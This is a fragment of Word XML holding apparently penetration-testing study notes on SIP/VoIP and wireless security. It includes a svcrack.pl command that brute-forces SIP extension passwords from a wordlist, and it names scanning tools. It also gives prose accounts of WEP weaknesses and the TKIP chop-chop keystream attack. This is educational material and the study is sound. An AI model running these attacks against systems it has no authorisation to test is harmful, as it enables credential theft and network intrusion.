      </w:r>
      <w:r w:rsidRPr="001A6291">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identify extentions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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svcrack.pl &lt;ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u &lt;ext&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001A6291">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-d pass.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6291">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crack passwords for &lt;ext&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A6291" w:rsidRDefault="001A6291" w:rsidP="001A6291">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A6291" w:rsidRDefault="001A6291" w:rsidP="001A6291">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sipscan.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is also a GUI based tool to enumerate details from a VOIP/SIP server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRPr="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6"/>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>D5b - Knowledge of the SIP protocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005859A6" w:rsidRPr="001A6291" w:rsidRDefault="005859A6" w:rsidP="005859A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6291">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SIP is the Internet Engineering Task Force (IETF) protocol, and the number of deployments using it or migrating over from H.323 is growing rapidly. SIP is not only used to signal voice traffic, but it also drives a number of other solutions and tools, such as instant messaging (IM). Normally operating on TCP/UDP 5060, SIP is similar in style to the HTTP protocol, and it implements different methods and response codes for session establishment and teardown. These methods and response codes are summarized in the following tables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B07BD3" w:rsidRPr="001A6291" w:rsidRDefault="00B07BD3" w:rsidP="005859A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2376"/>
        <w:gridCol w:w="6866"/>
      </w:tblGrid>
      <w:tr w:rsidR="005859A6" w:rsidRPr="001A6291" w:rsidTr="005B5F6E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>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Method </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6866" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>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Description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INVITE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Initiation message for a new conversation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ACK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Invites acknowledgement</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BYE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Terminates an existing session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CANCEL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Cancels all pending requests</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OPTIONS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Identifies server capabilities</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REGISTER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6866" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005859A6" w:rsidRPr="001A6291" w:rsidRDefault="001A6291" w:rsidP="00735E25">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SIP </w:t>
            </w:r>
            <w:r w:rsidR="005859A6" w:rsidRPr="001A6291">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>location registration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005859A6" w:rsidRPr="001A6291" w:rsidRDefault="005859A6" w:rsidP="005859A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005859A6" w:rsidRPr="001A6291" w:rsidRDefault="005859A6" w:rsidP="005859A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A6291">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Just like HTTP, responses are categorized by code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B5F6E" w:rsidRPr="001A6291" w:rsidRDefault="005B5F6E" w:rsidP="005859A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2376"/>
        <w:gridCol w:w="6866"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B07BD3" w:rsidRPr="001A6291" w:rsidTr="005B5F6E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>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Error Code </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6866" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>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Description</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1xx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Informational response messages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2xx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Successful response messages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3xx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Redirection responses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4xx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Client request failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001A6291" w:rsidRDefault="001A6291" w:rsidP="00B50C46"/>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>D6 – Wireless</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="0057323C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>D6a - Enumeration and fingerprinting of devices running Wireless (802.11) services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6C3E" w:rsidRPr="0057323C" w:rsidRDefault="001F6C3E" w:rsidP="001F6C3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057323C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Netstumbler.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0057323C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0057323C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0057323C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows GUI tool – active scanning but see becons too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRPr="0057323C" w:rsidRDefault="001F6C3E" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0057323C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kismet</w:t>
      </w:r>
      <w:r w:rsidRPr="0057323C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0057323C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0057323C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Linux tool – passive scanning – can identity all encryption types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>D6b - Knowledge of various options for encryption and authentication, and the relative methods of each</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>WEP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Wired Equivalent Privacy (WEP) is a deprecated algorithm to secure IEEE 802.11 wireless networks. Wireless networks broadcast messages using radio and are thus more susceptible to eavesdropping than wired networks. When introduced WEP was intended to provide confidentiality comparable to that of a traditional wired network. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>several serious weaknesses were identified by cryptanalysts with the result that today a WEP connection can be cracked with readily available software within minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004133F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WEP uses the stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity. Standard 64-bit WEP uses a 40 bit key, which is concatenated with a 24-bit initialization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004133F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">vector (IV) to form the RC4 traffic key. A 128-bit WEP key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">has the same 24-bit IV and 104bits for encryption. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="008C739C" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Two methods of authentication can be used with WEP: Open System authentication and Shared Key authentication.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C739C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open System authentication is preferable as </w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">t is possible to derive the keystream used for the handshake by capturing the challenge frames in Shared Key authentication. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="008C739C" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Open System authentication - the WLAN client need not provide its credentials to the Access Point during authentication. After the authentication and association, WEP can be used for encrypting the data frames. At this point, the client needs to have the right keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="008C739C" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Shared Key authentication- the WEP key is used for authentication. A four-way challenge-response handshake is used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="008C739C" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The client station sends an authentication request to the Access Point. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="008C739C" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Access Point sends back a clear-text challenge. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="008C739C" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The client has to encrypt the challenge text using the configured WEP key, and send it back in another authentication request. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="008C739C" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Access Point decrypts the material, and compares it with the clear-text it had sent. Depending on the success of this comparison, the Access Point sends back a positive or negative response. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="008C739C" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>After the authentication and association, the pre-shared WEP key is also used for encrypting the data frames using RC4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6C3E" w:rsidRPr="00996576" w:rsidRDefault="00996576" w:rsidP="001F6C3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Because RC4 is a stream cipher, the same traffic key must never be used twice. The purpose of an IV, which is transmitted as plain text, is to prevent any repetition, but a 24-bit IV is not long enough to ensure this on a busy network. The way the IV was used also opened WEP to a related key attack. For a 24-bit IV, there is a 50% probability the same IV will repeat after 5000 packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TKIP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="006A1A44" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Temporal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Integrity Protocol or TKIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a security protocol used in the IEEE 802.11 wireless networking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> standard. TKIP was designed </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to replace WEP without requiring the replacement of legacy hardware. This was necessary because the breaking of WEP had left WiFi networks without viable link-layer security, and a solution was required for already deployed hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="003071E1" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TKIP and the related WPA standard, implement three new security features to address security problems encountered in WEP protected networks. First, TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 initialization. Second, WPA implements a sequence counter to protect against replay attacks by rejecting packets received out of order at the access point. Finally, TKIP implements a 64-bit message integrity check named MICHAEL. TKIP ensures that every data packet is sent with a unique encryption key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="003071E1" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TKIP uses the same underlying mechanism as WEP, and consequently is vulnerable to a number of similar attacks. The message integrity check, per-packet key hashing, broadcast key rotation, and a sequence counter discourage many attacks. The key mixing function also eliminates the WEP key recovery attacks. Notwithstanding these changes, the weakness of some of these additions have allowed for new, although narrower, attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00996576" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TKIP is vulnerable to a keystream recovery attack that, if successfully executed, permits an attacker to transmit 7-15 packets of the attacker's choice on the network. The attack is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>an extension of the WEP chop-chop attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Because WEP utilizes a cryptographically insecure checksum mechanism (CRC32), an attacker can guess individual bytes of a packet, and the wireless access point will confirm or deny whether or not the guess is correct. If the guess is correct, the attacker will be able to detect the guess is correct and continue to guess other bytes of the packet. However, unlike the chop-chop attack against a WEP network, the attacker must wait for at least 60 seconds after a correct guess (a successful circumvention of the CRC32 mechanism) before continuing the attack. This is because although TKIP continues to use the CRC32 checksum mechanism, it implements an additional MIC code named Michael. If two incorrect Michael MIC codes are received within 60 seconds, the access point will implement countermeasures, meaning it will rekey the TKIP session key, thus changing future keystreams. Accordingly, TKIP attack will wait an appropriate amount of time to avoid these countermeasures. Because ARP packets are easily identified by their size, and the vast majority of the contents of this packet would be known to an attacker, the number of bytes an attacker must guess using the above method is rather small (approximately 14 bytes). Recovery of 12 bytes is possible in about 12 minutes on a typical network. An attacker already has access to the entire ciphertext packet. Upon retrieving the entire plaintext of the same packet, the attacker has access to the keystream of the packet, as well as the MIC code of the session. Using this information the attacker can construct a new packet and transmit it on the network. To </w:t>
      </w:r>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>circumvent the WPA implemented replay protection, attack utilizes QoS channels to transmit these newly constructed packets. An attacker able to transmit these packets may be able to implement any number of attacks, including ARP poisoning attacks, denial of service, and other similar attacks. Further refinements on the attack have been made, enabling attackers to inject a larger malicious packet (596 bytes, to be more specific) within approximately 18 minutes and 25 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>WPA/WPA2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Wi-Fi Pr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>otected Access (WPA and WPA2) are</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">wireless communication protection system produced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>response to several serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5571">
